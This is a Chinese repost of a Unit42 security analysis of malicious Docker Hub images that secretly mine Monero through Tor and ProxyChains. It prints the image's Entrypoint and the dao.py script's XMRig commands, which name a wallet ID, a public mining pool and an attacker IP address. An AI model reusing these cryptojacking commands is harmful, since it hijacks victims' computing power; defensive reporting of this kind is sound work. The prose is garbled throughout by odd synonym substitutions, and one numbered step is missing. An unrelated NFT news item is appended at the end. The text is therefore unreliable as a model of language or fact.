门罗币挖矿：利用Docker镜像的新方法

简介

Docker容器是一种对软件进行打包处理的便捷方法，因此采用率不断添加。Unit42研究人员发现了一个名为azurenql的DockerHub社区用户账号，其间含有8个库房和6个歹意门罗币挖矿镜像。下面是账号和库房的截图：

图1.DockerHub上的歹意Docker镜像

表1是DockerHub账户的所有镜像，下载次数最多的镜像被下载了147万次。

表1.DockerHub账户上的镜像总结

Docker镜像结构

研究人员检查了azurenql/227_135:442的镜像结构，该镜像是按如下过程结构的：

1、运用Ubuntu16.04.6LTS比如gcc、make、python等；

3、装置tor来对流量进行匿名处理，装备为默许端口9050；

/etc/tor/torrc
127.0.0.1:9050

4、仿制ProxyChains-NG源并从该源结构。ProxyChains的装备为默许装备来经过本地TorSOCKS署理衔接来路由流量。

/usr/local/etc/proxychains.conf
[ProxyList]
#defaultssetto”tor”
socks4127.0.0.19050

5、仿制挖矿软件XMRig的源，并从该源结构。

6、仿制定制的python脚本dao.py并将其设置为镜像的Entrypoint。

图2.镜像结构顺序

脚本dao.py剖析

镜像的作者包含了一个定制的Python脚本——dao.py，仿制在容器内开启挖矿进程。如前所述，脚本被注册为镜像的Entrypoint，因此镜像发动后，脚本就会运行。

“Entrypoint”:[
“/bin/sh”,
“-c”,
“python/etc/dao.py”
],

表1中的所有Docker镜像中都含有dao.py脚本或其变种。这些镜像中dao.py脚本的差异在于运用不同的XMRig指令行调用，如表2所示。

dao.py脚本的履行流如下所示：

1、核算体系内CPU核的数量；

2、设置hugepages体系特征来添加哈希率；

图3.设置hugepages体系特征来添加哈希率

3、装置Tor和构建依靠联系。

4、假如没有装置proxychains-ng，就从https://github.com/rofl0r/proxychains-ng.git装置；

5、假如/usr/local/bin中没有XMRig二进制文件（dll），就从https://github.com/nguyennhatduy2608/azures/raw/master/下载；

6、在/usr/local/binand/usr/bin中对XMRig二进制文件进行体系链接；

7、在后台发动Tor。

8、经过署理链来发动矿工，经过本地TorSOCKS署理来路由挖矿流量。dao.py脚本运用的不同挖矿指令如图2所示：

图4.运用proxychains发动挖矿的指令

脚本的履行工作流如图5所示：

图5.dao.py脚本履行序列

表2dao.py脚本中运用了的不同的挖矿指令

挖矿基础设施

加密货币挖矿是处理杂乱的核算难题，用户可以将买卖区块链接起来。歹意镜像运用受害者体系的处理才能来验证买卖。镜像的作者经过在用户环境中运行歹意镜像来挖矿。榜首种方法中，攻击者运用钱包ID直接提交挖到的区块到中心minexmr矿池。

os.system(“xmrig–av=7–variant1–donate-level=0-o
stratum+tcp://pool.minexmr.com:4444-u
43ZBkWEBNvSYQDsEMMCktSFHrQZTDwwyZfPp43FQknuy4UD3qhozWMtM4kKRyrr2
Nk66JEiTypfvPbkFd5fGXbA1LxwhFZf+20001”)

图6是钱包地址2020年4月-5月之间的挖矿活动。

图6.钱包ID活动

图7表明该钱包ID现已挖到了525.38XMR（门罗币），约合3.6万美元。

图7.钱包ID挖到的门罗币

第二种方法中，攻击者在运行挖矿池的保管服务中布置了实例用来搜集挖到的区块。

表2中的CryptoCommand列给出了该方法的示例：

os.system(“proxychains4″+program+”–donate-level1-o
stratum+tcp://66.42.93.164:442–tls-t”+str(cores))

参阅及来源：https://unit42.paloaltonetworks.com/cryptojacking-docker-images-for-mining-monero/

特别声明：以上内容(如有图片或视频亦包含在内)为自媒体渠道“网易号”用户上传并发布，本渠道仅提供信息存储服务。

来源：

此时快讯

【数据：比特币链上NFT销售额接近8亿美元】金色财经报道，据Cryptoslam数据显示，比特币链上销售额已达超过7.97亿美元，超越Cardano成为NFT销售额第六高的区块链，仅次于以太坊、Ronin、Solana、Polygon和Flow。